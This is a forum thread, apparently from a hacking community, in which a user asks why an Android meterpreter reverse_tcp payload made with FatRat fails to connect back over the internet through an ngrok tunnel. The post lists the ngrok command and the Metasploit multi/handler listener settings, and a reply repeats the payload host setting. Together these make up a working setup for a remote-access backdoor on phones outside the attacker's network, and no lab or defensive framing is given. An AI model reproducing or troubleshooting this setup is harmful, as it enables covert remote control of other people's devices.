Forum Thread: Need Help with FatRat Over WAN

Hey,

I was using Fatrat to create a reverse tcp payload for android. I have been successful in getting a metasploit session when both my attacker and target are on the same LAN.

But over WAN, I need port forwarding. To do that, I am using ngrok service.
Still I am not able to get a session. Metasploit stucks at starting the payload handler option..
Here is the commands I used

Starting ngrok :
./ngrok tcp 4564

For the payload :

  1. set lhost 0.tcp.ngrok.io
  2. set lport xxxx (port from ngrok)

For the listener :

I opened msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4564 (same as the port I started ngrok with)
exploit

Can anyone help me getting a meterpreter session over WAN? What is the problem here?
(I guess I can't establish a proper ngrok tunnel to my machine)

Previously I used SET kit with ngrok and it was working properly, but now it's giving me error(Attached image)imgur.com/a/anRZ9

Is it because of ngrok that I can't get a session? I would be grateful if someone can help me decoding this problem.

Thanks and have a good day.

3 Responses

*set payload android/meterpreter/reverse_tcp
set lhost 0.tcp.ngrok.io*

what will be the port if i use ./ngrok HTTP:8080

Share Your Thoughts

  • Hot
  • Active